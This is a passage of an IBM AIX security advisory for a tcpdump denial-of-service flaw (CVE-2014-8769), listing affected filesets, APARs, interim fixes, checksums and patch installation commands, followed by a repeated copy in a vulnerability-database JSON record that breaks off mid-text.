PLATFORMS: AIX 6.1, and 7.1 releases
VIOS 2.2.*
SOLUTION: Apply the fix as described below
THREAT: A remote attacker can cause denial of service
CVE Number: CVE-2014-8769 CVSS=5.00
Reboot required? NO
Workarounds? NO
Protected by FPM? NO
Protected by SED? NO
===============================================================================
DETAILED INFORMATION
I. DESCRIPTION (from cve.mitre.org)
CVE-2014-8769
tcpdump is vulnerable to a denial of service, caused by the improper
handling of input by the application decoder for the Ad hoc On-Demand
Distance Vector (AODV) protocol. By sending specially-crafted data, a
remote attacker could exploit this vulnerability to cause the application
to crash.
Please see following for more information:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8769
II. CVSS
CVE-2014-8769
CVSS Base Score: 5.00
CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/98764 for the
current score
CVSS Environmental Score*: Undefined
CVSS String: (AV:N/AC:L/Au:N/C:N/I:N/A:P)
III. PLATFORM VULNERABILITY ASSESSMENT
Note: To use the following commands on VIOS you must first
execute:
oem_setup_env
To determine if your system is vulnerable, execute the following
command:
lslpp -L bos.net.tcp.server
The following fileset levels are vulnerable:
AIX Fileset Lower Level Upper Level KEY
----------------------------------------------------------
bos.net.tcp.server 6.1.8.0 6.1.8.18 key_w_fs
bos.net.tcp.server 6.1.9.0 6.1.9.30 key_w_fs
bos.net.tcp.server 7.1.2.0 7.1.2.18 key_w_fs
bos.net.tcp.server 7.1.3.0 7.1.3.30 key_w_fs
AIX Fileset (VIOS) Lower Level Upper Level
----------------------------------------------------------------
bos.net.tcp.server 6.1.8.0(2.2.2.0) 6.1.8.18(2.2.2.6)
bos.net.tcp.server 6.1.9.0(2.2.3.0) 6.1.9.30(2.2.3.4)
IV. SOLUTIONS
A. APARS
IBM has assigned the following APARs to this problem:
AIX Level APAR number Availability KEY
-------------------------------------------------------------
6.1.8 IV68950 09/30/2015 SP7 key_w_apar
6.1.9 IV68992 05/29/2015 SP5 key_w_apar
7.1.2 IV68951 09/30/2015 SP7 key_w_apar
7.1.3 IV67588 05/29/2015 SP5 key_w_apar
Subscribe to the APARs here:
http://www.ibm.com/support/docview.wss?uid=isg1IV68950
http://www.ibm.com/support/docview.wss?uid=isg1IV68992
http://www.ibm.com/support/docview.wss?uid=isg1IV68951
http://www.ibm.com/support/docview.wss?uid=isg1IV67588
By subscribing, you will receive periodic email alerting you
to the status of the APAR, and a link to download the fix once
it becomes available.
B. FIXES
Fixes are available. The fixes can be downloaded via ftp or
http from:
ftp://aix.software.ibm.com/aix/efixes/security/tcpdump_fix.tar
https://aix.software.ibm.com/aix/efixes/security/tcpdump_fix.tar
The links above are to a tar file containing the signed
advisory, fix packages, and PGP signatures for each package.
The fixes below include prerequisite checking. This will
enforce the correct mapping between the fixes and AIX
Technology Levels.
AIX Level Interim Fix (*.Z) KEY
--------------------------------------------------
6.1.8.5 IV68950s5a.150205.epkg.Z key_w_fix
6.1.8.6 IV68950s5a.150205.epkg.Z key_w_fix
6.1.9.4 IV68992s4a.150204.epkg.Z key_w_fix
7.1.2.5 IV68951s5a.150205.epkg.Z key_w_fix
7.1.2.6 IV68951s5a.150205.epkg.Z key_w_fix
7.1.3.4 IV67588s4a.150204.epkg.Z key_w_fix
VIOS Level Interim Fix (*.Z)
-------------------------------------
2.2.2.5 IV68950s5a.150205.epkg.Z
2.2.2.6 IV68950s5a.150205.epkg.Z
2.2.3.4 IV68992s4a.150204.epkg.Z
To extract the fixes from the tar file:
tar -xvf tcpdump_fix.tar
cd tcpdump_fix
Verify you have retrieved the fixes intact:
The checksums below were generated using the
"openssl dgst -sha256 file" command as the followng:
openssl dgst -sha256 filename KEY
----------------------------------------------------------------------------------------------------
f35915e5d216820cdb2c530d9fb667bf7439293a310b1d17ba420aa613f10cd5 IV68950s5a.150205.epkg.Z key_w_csum
These sums should match exactly. The OpenSSL signatures in the tar
file and on this advisory can also be used to verify the
integrity of the fixes. If the sums or signatures cannot be
confirmed, contact IBM AIX Security at
security-alert@austin.ibm.com and describe the discrepancy.
openssl dgst -sha1 -verify <pubkey_file> -signature <advisory_file>.sig <advisory_file>
openssl dgst -sha1 -verify <pubkey_file> -signature <ifix_file>.sig <ifix_file>
C. FIX AND INTERIM FIX INSTALLATION
IMPORTANT: If possible, it is recommended that a mksysb backup
of the system be created. Verify it is both bootable and
readable before proceeding.
To preview a fix installation:
installp -a -d fix_name -p all # where fix_name is the name of the
# fix package being previewed.
To install a fix package:
installp -a -d fix_name -X all # where fix_name is the name of the
# fix package being installed.
Interim fixes have had limited functional and regression
testing but not the full regression testing that takes place
for Service Packs; however, IBM does fully support them.
Interim fix management documentation can be found at:
http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html
To preview an interim fix installation:
emgr -e ipkg_name -p # where ipkg_name is the name of the
# interim fix package being previewed.
To install an interim fix package:
emgr -e ipkg_name -X # where ipkg_name is the name of the
# interim fix package being installed.
V. WORKAROUNDS (from kb.isc.org)
None.
VI. OBTAINING FIXES
AIX security fixes can be downloaded from:
ftp://aix.software.ibm.com/aix/efixes/security
AIX fixes can be downloaded from:
http://www.ibm.com/eserver/support/fixes/fixcentral/main/pseries/aix
NOTE: Affected customers are urged to upgrade to the latest
applicable Technology Level and Service Pack.
VII. CONTACT INFORMATION
If you would like to receive AIX Security Advisories via email,
please visit "My Notifications":
http://www.ibm.com/support/mynotifications
and click on the "My notifications" link.
To view previously issued advisories, please visit:
http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq
Comments regarding the content of this announcement can be
directed to:
security-alert@austin.ibm.com
To obtain the OpenSSL public key that can be used to verify the
signed advisories and ifixes:
Download the key from our web page:
http://www.ibm.com/systems/resources/systems_p_os_aix_security_pgpkey.txt
To obtain the PGP public key that can be used to communicate
securely with the AIX Security Team you can either:
A. Send an email with "get key" in the subject line to:
security-alert@austin.ibm.com
B. Download the key from a PGP Public Key Server. The key ID is:
0x28BFAA12
Please contact your local IBM AIX support center for any
assistance.
VIII. ACKNOWLEDGMENTS
N/A.
IX. REFERENCES:
Complete CVSS Guide: http://www.first.org/cvss/cvss-guide.html
On-line Calculator V2: http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2
X-Force Vulnerability Database: http://xforce.iss.net/xforce/xfdb/
CVE-2014-8769: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8769
*The CVSS Environment Score is customer environment specific and will
ultimately impact the Overall CVSS Score. Customers can evaluate the
impact of this vulnerability in their environments by accessing the links
in the Reference section of this Flash.
Note: According to the Forum of Incident Response and Security Teams
(FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry
open standard designed to convey vulnerability severity and help to
determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES
"AS IS" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE
RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY
VULNERABILITY.
{"id": "TCPDUMP_ADVISORY.ASC", "bulletinFamily": "unix", "title": "Vulnerability in AIX tcpdump", "description": "IBM SECURITY ADVISORY\n\nFirst Issued: Wed Mar 18 10:29:53 CDT 2015\n|Updated: Tue Mar 24 13:39:27 CDT 2015\n|Update: Corrected 6.1.9.4 iFix checksum\n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/tcpdump_advisory.asc\nhttps://aix.software.ibm.com/aix/efixes/security/tcpdump_advisory.asc\nftp://aix.software.ibm.com/aix/efixes/security/tcpdump_advisory.asc\n===============================================================================\n VULNERABILITY SUMMARY\n\nVULNERABILITY: Vulnerability in AIX tcpdump\n\n PLATFORMS: AIX 6.1, and 7.1 releases\n VIOS 2.2.*\n\n SOLUTION: Apply the fix as described below\n\n THREAT: A remote attacker can cause denial of service\n\n CVE Number: CVE-2014-8769 CVSS=5.00\n\n Reboot required? NO\n Workarounds? NO\n Protected by FPM? NO\n Protected by SED? NO\n\n===============================================================================\n DETAILED INFORMATION\n\nI. DESCRIPTION (from cve.mitre.org)\n\n CVE-2014-8769\n tcpdump is vulnerable to a denial of service, caused by the improper\n handling of input by the application decoder for the Ad hoc On-Demand\n Distance Vector (AODV) protocol. By sending specially-crafted data, a\n remote attacker could exploit this vulnerability to cause the application\n to crash.\n\n Please see following for more information:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8769\n\nII. CVSS\n\n CVE-2014-8769 \n CVSS Base Score: 5.00\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/98764 for the\n current score\n CVSS Environmental Score*: Undefined\n CVSS String: (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\nIII. PLATFORM VULNERABILITY ASSESSMENT\n\n Note: To use the following commands on VIOS you must first\n execute:\n\n oem_setup_env\n\n To determine if your system is vulnerable, execute the following\n command:\n\n lslpp -L bos.net.tcp.server\n\n The following fileset levels are vulnerable:\n\n AIX Fileset Lower Level Upper Level KEY\n ----------------------------------------------------------\n bos.net.tcp.server 6.1.8.0 6.1.8.18 key_w_fs\n bos.net.tcp.server 6.1.9.0 6.1.9.30 key_w_fs\n bos.net.tcp.server 7.1.2.0 7.1.2.18 key_w_fs\n bos.net.tcp.server 7.1.3.0 7.1.3.30 key_w_fs\n\n\n AIX Fileset (VIOS) Lower Level Upper Level\n ----------------------------------------------------------------\n bos.net.tcp.server 6.1.8.0(2.2.2.0) 6.1.8.18(2.2.2.6)\n bos.net.tcp.server 6.1.9.0(2.2.3.0) 6.1.9.30(2.2.3.4)\n\nIV. SOLUTIONS\n\n A. APARS\n\n IBM has assigned the following APARs to this problem:\n\n AIX Level APAR number Availability KEY\n -------------------------------------------------------------\n 6.1.8 IV68950 09/30/2015 SP7 key_w_apar\n 6.1.9 IV68992 05/29/2015 SP5 key_w_apar\n 7.1.2 IV68951 09/30/2015 SP7 key_w_apar\n 7.1.3 IV67588 05/29/2015 SP5 key_w_apar\n\n Subscribe to the APARs here:\n\n http://www.ibm.com/support/docview.wss?uid=isg1IV68950\n http://www.ibm.com/support/docview.wss?uid=isg1IV68992\n http://www.ibm.com/support/docview.wss?uid=isg1IV68951\n http://www.ibm.com/support/docview.wss?uid=isg1IV67588\n\n By subscribing, you will receive periodic email alerting you\n to the status of the APAR, and a link to download the fix once\n it becomes available.\n\n B. FIXES\n\n Fixes are available. The fixes can be downloaded via ftp or\n http from:\n\n ftp://aix.software.ibm.com/aix/efixes/security/tcpdump_fix.tar\n https://aix.software.ibm.com/aix/efixes/security/tcpdump_fix.tar\n\n The links above are to a tar file containing the signed\n advisory, fix packages, and PGP signatures for each package.\n The fixes below include prerequisite checking. This will\n enforce the correct mapping between the fixes and AIX\n Technology Levels.\n\n AIX Level Interim Fix (*.Z) KEY\n --------------------------------------------------\n 6.1.8.5 IV68950s5a.150205.epkg.Z key_w_fix \n 6.1.8.6 IV68950s5a.150205.epkg.Z key_w_fix\n 6.1.9.4 IV68992s4a.150204.epkg.Z key_w_fix\n 7.1.2.5 IV68951s5a.150205.epkg.Z key_w_fix\n 7.1.2.6 IV68951s5a.150205.epkg.Z key_w_fix\n 7.1.3.4 IV67588s4a.150204.epkg.Z key_w_fix\n\n VIOS Level Interim Fix (*.Z)\n -------------------------------------\n 2.2.2.5 IV68950s5a.150205.epkg.Z\n 2.2.2.6 IV68950s5a.150205.epkg.Z \n 2.2.3.4 IV68992s4a.150204.epkg.Z \n\n To extract the fixes from the tar file:\n tar -xvf tcpdump_fix.tar\n cd tcpdump_fix\n\n Verify you have retrieved the fixes intact:\n\n\t\tThe checksums below were generated using the\n \"openssl dgst -sha256 file\" command as the followng:\n\n openssl dgst -sha256 filename KEY\n ----------------------------------------------------------------------------------------------------\n f35915e5d216820cdb2c530d9fb667bf7439293a310b1d17ba420aa613f10cd5 IV68950s5a.150205.epkg.Z key_w_csum \n| 2f0e6e863647a6c4a786a881363b1dc62aa5c3612aab5d2761ab0c14a7d799be IV68992s4a.150204.epkg.Z key_w_csum\n 7baa89d4387dd0251b83b4598773d3fc5b8bb6080a50bc3ee3881e70b5052fed IV68951s5a.150205.epkg.Z key_w_csum\n 753e23a332f7e617007159bebb5e4d02c5bfdc0a2566714546b9c2ec4d512978 IV67588s4a.150204.epkg.Z key_w_csum\n\n These sums should match exactly. The OpenSSL signatures in the tar\n file and on this advisory can also be used to verify the\n integrity of the fixes. If the sums or signatures cannot be\n confirmed, contact IBM AIX Security at\n security-alert@austin.ibm.com and describe the discrepancy.\n\n openssl dgst -sha1 -verify <pubkey_file> -signature <advisory_file>.sig <advisory_file>\n\n openssl dgst -sha1 -verify <pubkey_file> -signature <ifix_file>.sig <ifix_file>\n\n C. FIX AND INTERIM FIX INSTALLATION\n\n IMPORTANT: If possible, it is recommended that a mksysb backup\n of the system be created. Verify it is both bootable and\n readable before proceeding.\n\n To preview a fix installation:\n\n installp -a -d fix_name -p all # where fix_name is the name of the\n # fix package being previewed.\n To install a fix package:\n\n installp -a -d fix_name -X all # where fix_name is the name of the\n # fix package being installed.\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; however, IBM does fully support them.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e ipkg_name -p # where ipkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e ipkg_name -X # where ipkg_name is the name of the\n # interim fix package being installed.\n\nV. WORKAROUNDS (from kb.isc.org)\n None.\n\nVI. OBTAINING FIXES\n\n AIX security fixes can be downloaded from:\n\n ftp://aix.software.ibm.com/aix/efixes/security\n\n AIX fixes can be downloaded from:\n\n http://www.ibm.com/eserver/support/fixes/fixcentral/main/pseries/aix\n\n NOTE: Affected customers are urged to upgrade to the latest\n applicable Technology Level and Service Pack.\n\nVII. CONTACT INFORMATION\n\n If you would like to receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n\n and click on the \"My notifications\" link.\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n\n Comments regarding the content of this announcement can be\n directed to:\n\n security-alert@austin.ibm.com\n\n To obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pgpkey.txt\n\n To obtain the PGP public key that can be used to communicate\n securely with the AIX Security Team you can either:\n\n A. Send an email with \"get key\" in the subject line to:\n\n security-alert@austin.ibm.com\n\n B. Download the key from a PGP Public Key Server. The key ID is:\n\n 0x28BFAA12\n\n Please contact your local IBM AIX support center for any\n assistance.\n\nVIII. ACKNOWLEDGMENTS\n N/A.\n\nIX. REFERENCES:\n\n Complete CVSS Guide: http://www.first.org/cvss/cvss-guide.html\n On-line Calculator V2: http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\n X-Force Vulnerability Database: http://xforce.iss.net/xforce/xfdb/\n CVE-2014-8769: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8769\n\n *The CVSS Environment Score is customer environment specific and will\n ultimately impact the Overall CVSS Score. Customers can evaluate the\n impact of this vulnerability in their environments by accessing the links\n in the Reference section of this Flash.\n\n Note: According to the Forum of Incident Response and Security Teams\n (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry\n open standard designed to convey vulnerability severity and help to\n determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES\n \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF\n MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE\n RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY\n VULNERABILITY.\n", "published": "2015-03-18T10:29:53", "modified": "2015-03-24T13:39:27", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}, "href": "https://aix.software.ibm.com/aix/efixes/security/tcpdump_advisory.asc", "reporter": "CentOS Project", "references": [], "cvelist": ["CVE-2014-8769"], "type": "aix", "lastseen": "2018-08-31T00:08:38", "history": [{"bulletin": {"aix": {"apars": []}, "aixFileset": [{"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02"], "versionGte": "7.1.3.0", "versionLte": "7.1.3.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02"], "versionGte": "7.1.3.0", "versionLte": "7.1.3.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02"], "versionGte": "7.1.3.0", "versionLte": "7.1.3.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02"], "versionGte": "7.1.3.0", "versionLte": "7.1.3.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02"], "versionGte": "7.1.3.0", "versionLte": "7.1.3.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.8.0", "versionLte": "6.1.8.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.8.0", "versionLte": "6.1.8.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.8.0", "versionLte": "6.1.8.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.8.0", "versionLte": "6.1.8.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.8.0", "versionLte": "6.1.8.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.8.0", "versionLte": "6.1.8.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.8.0", "versionLte": "6.1.8.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01"], "versionGte": "6.1.9.0", "versionLte": "6.1.9.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01"], "versionGte": "6.1.9.0", "versionLte": "6.1.9.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01"], "versionGte": "6.1.9.0", "versionLte": "6.1.9.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01"], "versionGte": "6.1.9.0", "versionLte": "6.1.9.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01"], "versionGte": "6.1.9.0", "versionLte": "6.1.9.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.2.0", "versionLte": "7.1.2.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.2.0", "versionLte": "7.1.2.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.2.0", "versionLte": "7.1.2.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.2.0", "versionLte": "7.1.2.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.2.0", "versionLte": "7.1.2.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.2.0", "versionLte": "7.1.2.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.2.0", "versionLte": "7.1.2.18"}], "bulletinFamily": "unix", "cvelist": ["CVE-2014-8769"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "IBM SECURITY ADVISORY\n\nFirst Issued: Wed Mar 18 10:29:53 CDT 2015\n|Updated: Tue Mar 24 13:39:27 CDT 2015\n|Update: Corrected 6.1.9.4 iFix checksum\n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/tcpdump_advisory.asc\nhttps://aix.software.ibm.com/aix/efixes/security/tcpdump_advisory.asc\nftp://aix.software.ibm.com/aix/efixes/security/tcpdump_advisory.asc\n===============================================================================\n VULNERABILITY SUMMARY\n\nVULNERABILITY: Vulnerability in AIX tcpdump\n\n PLATFORMS: AIX 6.1, and 7.1 releases\n VIOS 2.2.*\n\n SOLUTION: Apply the fix as described below\n\n THREAT: A remote attacker can cause denial of service\n\n CVE Number: CVE-2014-8769 CVSS=5.00\n\n Reboot required? NO\n Workarounds? NO\n Protected by FPM? NO\n Protected by SED? NO\n\n===============================================================================\n DETAILED INFORMATION\n\nI. DESCRIPTION (from cve.mitre.org)\n\n CVE-2014-8769\n tcpdump is vulnerable to a denial of service, caused by the improper\n handling of input by the application decoder for the Ad hoc On-Demand\n Distance Vector (AODV) protocol. By sending specially-crafted data, a\n remote attacker could exploit this vulnerability to cause the application\n to crash.\n\n Please see following for more information:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8769\n\nII. CVSS\n\n CVE-2014-8769 \n CVSS Base Score: 5.00\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/98764 for the\n current score\n CVSS Environmental Score*: Undefined\n CVSS String: (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\nIII. PLATFORM VULNERABILITY ASSESSMENT\n\n Note: To use the following commands on VIOS you must first\n execute:\n\n oem_setup_env\n\n To determine if your system is vulnerable, execute the following\n command:\n\n lslpp -L bos.net.tcp.server\n\n The following fileset levels are vulnerable:\n\n AIX Fileset Lower Level Upper Level KEY\n ----------------------------------------------------------\n bos.net.tcp.server 6.1.8.0 6.1.8.18 key_w_fs\n bos.net.tcp.server 6.1.9.0 6.1.9.30 key_w_fs\n bos.net.tcp.server 7.1.2.0 7.1.2.18 key_w_fs\n bos.net.tcp.server 7.1.3.0 7.1.3.30 key_w_fs\n\n\n AIX Fileset (VIOS) Lower Level Upper Level\n ----------------------------------------------------------------\n bos.net.tcp.server 6.1.8.0(2.2.2.0) 6.1.8.18(2.2.2.6)\n bos.net.tcp.server 6.1.9.0(2.2.3.0) 6.1.9.30(2.2.3.4)\n\nIV. SOLUTIONS\n\n A. APARS\n\n IBM has assigned the following APARs to this problem:\n\n AIX Level APAR number Availability KEY\n -------------------------------------------------------------\n 6.1.8 IV68950 09/30/2015 SP7 key_w_apar\n 6.1.9 IV68992 05/29/2015 SP5 key_w_apar\n 7.1.2 IV68951 09/30/2015 SP7 key_w_apar\n 7.1.3 IV67588 05/29/2015 SP5 key_w_apar\n\n Subscribe to the APARs here:\n\n http://www.ibm.com/support/docview.wss?uid=isg1IV68950\n http://www.ibm.com/support/docview.wss?uid=isg1IV68992\n http://www.ibm.com/support/docview.wss?uid=isg1IV68951\n http://www.ibm.com/support/docview.wss?uid=isg1IV67588\n\n By subscribing, you will receive periodic email alerting you\n to the status of the APAR, and a link to download the fix once\n it becomes available.\n\n B. FIXES\n\n Fixes are available. The fixes can be downloaded via ftp or\n http from:\n\n ftp://aix.software.ibm.com/aix/efixes/security/tcpdump_fix.tar\n https://aix.software.ibm.com/aix/efixes/security/tcpdump_fix.tar\n\n The links above are to a tar file containing the signed\n advisory, fix packages, and PGP signatures for each package.\n The fixes below include prerequisite checking. This will\n enforce the correct mapping between the fixes and AIX\n Technology Levels.\n\n AIX Level Interim Fix (*.Z) KEY\n --------------------------------------------------\n 6.1.8.5 IV68950s5a.150205.epkg.Z key_w_fix \n 6.1.8.6 IV68950s5a.150205.epkg.Z key_w_fix\n 6.1.9.4 IV68992s4a.150204.epkg.Z key_w_fix\n 7.1.2.5 IV68951s5a.150205.epkg.Z key_w_fix\n 7.1.2.6 IV68951s5a.150205.epkg.Z key_w_fix\n 7.1.3.4 IV67588s4a.150204.epkg.Z key_w_fix\n\n VIOS Level Interim Fix (*.Z)\n -------------------------------------\n 2.2.2.5 IV68950s5a.150205.epkg.Z\n 2.2.2.6 IV68950s5a.150205.epkg.Z \n 2.2.3.4 IV68992s4a.150204.epkg.Z \n\n To extract the fixes from the tar file:\n tar -xvf tcpdump_fix.tar\n cd tcpdump_fix\n\n Verify you have retrieved the fixes intact:\n\n\t\tThe checksums below were generated using the\n \"openssl dgst -sha256 file\" command as the followng:\n\n openssl dgst -sha256 filename KEY\n ----------------------------------------------------------------------------------------------------\n f35915e5d216820cdb2c530d9fb667bf7439293a310b1d17ba420aa613f10cd5 IV68950s5a.150205.epkg.Z key_w_csum \n| 2f0e6e863647a6c4a786a881363b1dc62aa5c3612aab5d2761ab0c14a7d799be IV68992s4a.150204.epkg.Z key_w_csum\n 7baa89d4387dd0251b83b4598773d3fc5b8bb6080a50bc3ee3881e70b5052fed IV68951s5a.150205.epkg.Z key_w_csum\n 753e23a332f7e617007159bebb5e4d02c5bfdc0a2566714546b9c2ec4d512978 IV67588s4a.150204.epkg.Z key_w_csum\n\n These sums should match exactly. The OpenSSL signatures in the tar\n file and on this advisory can also be used to verify the\n integrity of the fixes. If the sums or signatures cannot be\n confirmed, contact IBM AIX Security at\n security-alert@austin.ibm.com and describe the discrepancy.\n\n openssl dgst -sha1 -verify <pubkey_file> -signature <advisory_file>.sig <advisory_file>\n\n openssl dgst -sha1 -verify <pubkey_file> -signature <ifix_file>.sig <ifix_file>\n\n C. FIX AND INTERIM FIX INSTALLATION\n\n IMPORTANT: If possible, it is recommended that a mksysb backup\n of the system be created. Verify it is both bootable and\n readable before proceeding.\n\n To preview a fix installation:\n\n installp -a -d fix_name -p all # where fix_name is the name of the\n # fix package being previewed.\n To install a fix package:\n\n installp -a -d fix_name -X all # where fix_name is the name of the\n # fix package being installed.\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; however, IBM does fully support them.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e ipkg_name -p # where ipkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e ipkg_name -X # where ipkg_name is the name of the\n # interim fix package being installed.\n\nV. WORKAROUNDS (from kb.isc.org)\n None.\n\nVI. OBTAINING FIXES\n\n AIX security fixes can be downloaded from:\n\n ftp://aix.software.ibm.com/aix/efixes/security\n\n AIX fixes can be downloaded from:\n\n http://www.ibm.com/eserver/support/fixes/fixcentral/main/pseries/aix\n\n NOTE: Affected customers are urged to upgrade to the latest\n applicable Technology Level and Service Pack.\n\nVII. CONTACT INFORMATION\n\n If you would like to receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n\n and click on the \"My notifications\" link.\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n\n Comments regarding the content of this announcement can be\n directed to:\n\n security-alert@austin.ibm.com\n\n To obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pgpkey.txt\n\n To obtain the PGP public key that can be used to communicate\n securely with the AIX Security Team you can either:\n\n A. Send an email with \"get key\" in the subject line to:\n\n security-alert@austin.ibm.com\n\n B. Download the key from a PGP Public Key Server. The key ID is:\n\n 0x28BFAA12\n\n Please contact your local IBM AIX support center for any\n assistance.\n\nVIII. ACKNOWLEDGMENTS\n N/A.\n\nIX. REFERENCES:\n\n Complete CVSS Guide: http://www.first.org/cvss/cvss-guide.html\n On-line 